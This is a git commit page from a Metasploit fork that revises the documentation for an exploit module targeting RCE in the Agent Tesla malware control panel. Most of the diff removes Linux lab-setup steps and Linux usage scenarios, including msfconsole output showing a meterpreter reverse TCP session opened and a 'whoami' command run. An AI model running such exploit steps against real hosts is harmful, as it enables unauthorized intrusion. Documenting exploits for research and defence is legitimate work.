adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Make adjustments so that this module only supports Windows so that we can land this for now. Linux support may be added in the future.

Browse Source
This commit is contained in:
gwillcox-r7
2020-06-17 14:56:40 -05:00
parent c29cf491ed
commit eebacb8fbb
2 changed files with 49 additions and 213 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md
+10 -138
View File
@@ -2,37 +2,32 @@
### Description
This module exploits a command injection vulnerability within the control center of Agent Tesla versions XXX to XXX (was this ever patched?). Attackers can turn this vulnerability into an RCE can be obtained by exploiting two vulnerabilities (SQLi + PHP Object Injection) that occur within the `WebPanel/server_side/scripts/server_processing.php` file.
Note that due to additional security updates that were made to the Agent Tesla panel on September 12th 2018, any web panel versions released on or after this date will require authentication in order for the attacker to gain RCE. The code which was introduced can be seen in the snippet below:
This module exploits a command injection vulnerability within the control center of Agent Tesla. Attackers can turn this vulnerability into an RCE can be obtained by exploiting two vulnerabilities (SQLi + PHP Object Injection) that occur within the `WebPanel/server_side/scripts/server_processing.php` file. On versions prior to September 12th 2018, attackers can exploit this vulnerability to gain unauthenicated RCE as the user running the web server. Versions released on or after September 12th 2018 have the following fix that was introduced which means that attackers will require valid credentials in order to exploit this vulnerability:
```
session_start();
if (!isset($_SESSION['logged_in'])
|| $_SESSION['logged_in'] !== true) {
header('Location: login.php');
exit;
}
if (!isset($_SESSION['logged_in'])
|| $_SESSION['logged_in'] !== true) {
header('Location: login.php');
exit;
}
```
**NOTE:**
Using [CyberCrime Tracker](https://cybercrime-tracker.net/), it was possible to locate several Agent Tesla web panels available for download. As there are no version numbers displayed in the Agent Tesla control center, it was hard to identify exactly which releases were available for download. However it is possible to perform some level of version identification by using the dates/times of the files contained in the `zip` archives to evaluate how recent/old a particular release is. From the file timestamps, the following versions were determined to be available via [CyberCrime Tracker](https://cybercrime-tracker.net/):
Using [CyberCrime Tracker](https://cybercrime-tracker.net/), it was possible to locate several Agent Tesla web panels available for download. As there are no version numbers displayed in the Agent Tesla control center, it was hard to identify exactly which releases were available for download. However it was possible to perform to determine roughly when various editions of Agent Tesla were released by using the timestamps on the files contained in the `zip` archives. From this information, it was determined that [CyberCrime Tracker](https://cybercrime-tracker.net/) had the following unique versions available for download:
[WebPanel1.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel1.7z) -Released in 2017- (unauthenticated RCE), source code protected by `ioncube`.
[WebPanel1.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel1.7z) - Released in 2017 - (unauthenticated RCE), source code protected by `ioncube`.
* Tested on Windows 7 x64 with WAMP server 3.2.0 x64 and PHP version 5.6.40.
* Tested on Debian 9.9.0 with PHP version 5.6.40.
[WebPanel2.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z) -Released in 2018- (authenticated RCE), source code protected by `ioncube`.
[WebPanel2.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z) - Released in 2018 - (authenticated RCE), source code protected by `ioncube`.
* Tested on Windows 7 x64 with WAMP server 3.2.0 x64 and PHP version 7.2.18.
* Tested on Debian 9.9.0 with PHP version 7.2.31.
[WebPanel3.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel3.7z) -Released in 2019- (authenticated RCE), source code is not obfuscated, **don't need** `ioncube`.
[WebPanel3.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel3.7z) - Released in 2019 - (authenticated RCE), source code is not obfuscated, **don't need** `ioncube`.
* Tested on Windows 7 x64 WAMP server 3.2.0 x64 and PHP version 5.6.40.
* Tested on Debian 9.9.0 with PHP version 7.2.31.
### Setup
@@ -56,73 +51,6 @@ Using [CyberCrime Tracker](https://cybercrime-tracker.net/), it was possible to
12. Set the `Database Host` field to `127.0.0.1`, the `MySql Username` field to `root`, leave the `MySql Password` field, set the `Database Name` field to `tesla` and set the `Username` and `Password` fields under `Login Informations` section to the username and password you would like to log into the web panel as.
13. Browse to `http://127.0.0.1/WebPanel/login.php` and confirm you can log into the web panel and view the main web panel itself. You should see a header titled `Dashboard` followed by some sections labeled `Computers`, `Keystrokes`, `Passwords` and `Screenshots` if the login succeeded.
#### Using Linux
##### Install LAMP (Apache, MySQL, PHP)
For this, you can use a Linux Debian 9.9.0 (Stretch) x86_x64 as sandboxing system.
1. Install LAMP (Apache, MySQL, PHP).
```bash
sudo apt-add-repository ppa:ondrej/apache2
sudo apt-add-repository ppa:ondrej/php
sudo apt-get update
sudo apt-get install apache2 apache2-utils mariadb-server mariadb-client ca-certificates apt-transport-https
# For PHP 5.6.40:
sudo apt-get install php5.6 php5.6-cli php5.6-common php5.6-curl php5.6-mbstring php5.6-mysql php5.6-xml libapache2-mod-php5.6 php5.6-json php5.6-opcache php5.6-readline
# For PHP 7.2.31:
sudo apt-get install php7.2 php7.2-cli php7.2-common php7.2-curl php7.2-mbstring php7.2-mysql php7.2-xml libapache2-mod-php7.2 php7.2-json php7.2-opcache php7.2-readline
```
2. Execute `sudo mysql_secure_installation` and press enter when prompted for the `root` password, set a new `root` user password (be sure to remember this!) and press `Y` for the rest of the prompts.
3. Create a blank database for Agent Tesla using the following commands:
```
sudo mysql -u root -ppassword
CREATE DATABASE tesla;
CREATE USER 'user' IDENTIFIED BY 'password';
GRANT USAGE ON *.* TO 'user'@localhost IDENTIFIED BY 'password';
GRANT ALL PRIVILEGES ON `tesla`.* TO 'user'@localhost;
FLUSH PRIVILEGES;
exit
```
4. Download the Agent Tesla control panels locally:
```
wget https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel1.7z
wget https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z
wget https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel3.7z
```
4. Install the p7zip-full package and extract the files from the command line
```
sudo apt install p7zip-full
7z x WebPanel1.7z && mv WebPanel/ WebPanel1/
7z x WebPanel2.7z && mv WebPanel/ WebPanel2/
7z x WebPanel3.7z && mv WebPanel/ WebPanel3/
chmod a+rw WebPanel*/
```
5. Copy one of the target webpanels over for installation and delete the default config.php file
```
sudo cp -r WebPanel3/ /var/www/html/
sudo mv /var/www/html/WebPanel3/ /var/www/html/WebPanel/
sudo rm -rf /var/www/html/WebPanel/config.php
```
6. Make the /var/www/html/WebPanel/ directory readable and writeable by all
```
sudo chmod -R a+rw /var/www/html/WebPanel/
sudo chown -R www-data:www-data /var/www/html/WebPanel/
```
7. Browse to http://127.0.0.1/WebPanel/setup.php and set the `Database Host` field to `127.0.0.1`, the `MySql Username` field to `user`, the `MySql Password` field to `password`, the `Database Name` field to `tesla`, the `Username` and `Password` fields under `Login Informations` section to the username and password you would like to log into the web panel as.
8. Browse to `http://127.0.0.1/WebPanel/logout.php` to ensure you are properly logged out. Then browse to Browse to `http://127.0.0.1/WebPanel/login.php` and log in with the login details you placed in the `Login Informations` section. You should see a header titled `Dashboard` followed by some sections labeled `Computers`, `Keystrokes`, `Passwords` and `Screenshots` if the login succeeded.
#### Installing Ioncube
##### Windows
@@ -142,20 +70,6 @@ Follow [Install WAMP Server 3.2.0 on Windows 10 x64](#Install%20WAMP%20Server%20
7. Right click on the WAMP tray icon and click `Refresh`.
8. Browse to `http://127.0.0.1/loader-wizard/ioncube/loader-wizard.php?timeout=0&ini=0&page=loader_check` and verify that ionCube Loader was installed successfully.
##### Linux
Follow [Install LAMP (Apache, MySQL, PHP)](#Install%20LAMP%20%28Apache%2C%20MySQL%2C%20PHP%29) steps.
1. Download [ioncube loader wizard](https://www.ioncube.com/loader-wizard/loader-wizard.tgz).
2. Make sure you have a proper version of PHP installed for the WebPanel you wish to use before using the `ioncube loader wizard`.
* For [WebPanel1.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel1.7z) you need PHP 5.6.40.
* For [WebPanel2.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z) you need PHP 7.2.31.
3. Uncompress `loader-wizard.tgz` into your web root directory: `/var/www/html/`.
4. Go to http://localhost/ioncube/loader-wizard.php and follow the installation instructions.
## Verification Steps
Follow [Setup](#Setup) and [Scenarios](#Scenarios).
@@ -186,48 +100,6 @@ The Agent Tesla CnC username to authenticate with (needed for authenticated RCE
## Scenarios
### Agent Tesla (panel < September 12 2018) Unauthenticated on Linux
1. Start msfconsole
2. Do: `use exploit/multi/http/agent_tesla_panel_rce`
3. Do: `set RHOSTS 192.168.1.21`
4. Do: `run`
```
msf5 exploit(multi/http/agent_tesla_panel_rce) > run
[*] Started reverse TCP handler on 192.168.1.13:4444
[*] Targeted operating system is: linux
[*] Sending php/meterpreter/reverse_tcp command payload
[*] Payload uploaded as: .WxWf.php
[*] Sending stage (38247 bytes) to 192.168.1.25
[*] Meterpreter session 2 opened (192.168.1.13:4444 -> 192.168.1.25:43260) at 2019-09-04 14:44:07 +0400
meterpreter >
```
### Agent Tesla (panel >= September 12 2018) Authenticated on Linux
1. Start msfconsole
2. Do: `use exploit/multi/http/agent_tesla_panel_rce`
3. Do: `set RHOSTS 192.168.1.21`
4. Do: `set USERNAME admin`
5. Do: `set PASSWORD password`
```
msf5 exploit(multi/http/agent_tesla_panel_rce) > set target 1
target => 1
msf5 exploit(multi/http/agent_tesla_panel_rce) > set cmd whoami
cmd => whoami
msf5 exploit(multi/http/agent_tesla_panel_rce) > run
[*] Sending cmd/unix/generic command payload
[!] Dumping command output in parsed json response
www-data
[*] Exploit completed, but no session was created.
msf5 exploit(multi/http/agent_tesla_panel_rce) >
```
### WebPanel1.7z on Windows 10 x64 19H2 with WAMP 3.2.2.2 x64, PHP 5.6.40, Apache 2.4.41, MariaDB 10.4.10
```
msf5 > use exploit/multi/http/agent_tesla_panel_rce